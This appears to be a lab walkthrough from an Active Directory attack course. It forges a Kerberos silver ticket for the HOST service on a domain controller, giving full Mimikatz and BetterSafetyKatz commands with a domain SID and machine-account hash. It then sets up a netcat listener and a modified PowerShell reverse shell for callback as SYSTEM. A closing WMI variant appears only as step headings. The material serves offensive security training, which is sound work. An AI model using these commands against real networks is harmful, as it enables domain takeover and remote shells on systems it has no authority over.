Obj 9 Silver Ticket for Host
Task Get command execution on DC by creating a silver ticket for Host Service, WMI.
From the information gathered in previous steps we have the hash for machine account of the domain controller (dcorp-dc$). We are going to use this information to create a silver ticket for the Host service on the DC.
Run the following command from an elevated shell
Silver Ticket - BetterSafetyKatz
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:1e16be70054d1c5999aa53994e03e59c/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"Silver Ticket - Mimikatz
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:1e16be70054d1c5999aa53994e03e59c/startoffset:0 /endin:600 /renewmax:10080 /ptt"'Start a netcat listener on the student vm
nc64.exe -lvnp 443We need to run a modified reverse powershell script
Create a copy of Invoke-PowerShellTcp.ps1 and rename it to Invoke-PowerShellTcpEx.ps1.
-Open Invoke-PowerShellTcpEx.ps1 in PowerShell ISE (Right click on it and click Edit).
-Add Power -Reverse -IPAddress 172.16.100.X-Port 443
to the end of the file.Now, Lets create a task on the DC to download our new script
Now we can run the task to run our script
We should have gotten a call back on our listener as nt/authority!
- PART 2 - This is the same result as above just another way to do it
Create Silver Ticket
Inject a ticket for RPCSS
Check to make sure the ticket is present
Now we can try to run WMI commands on the DC
Last updated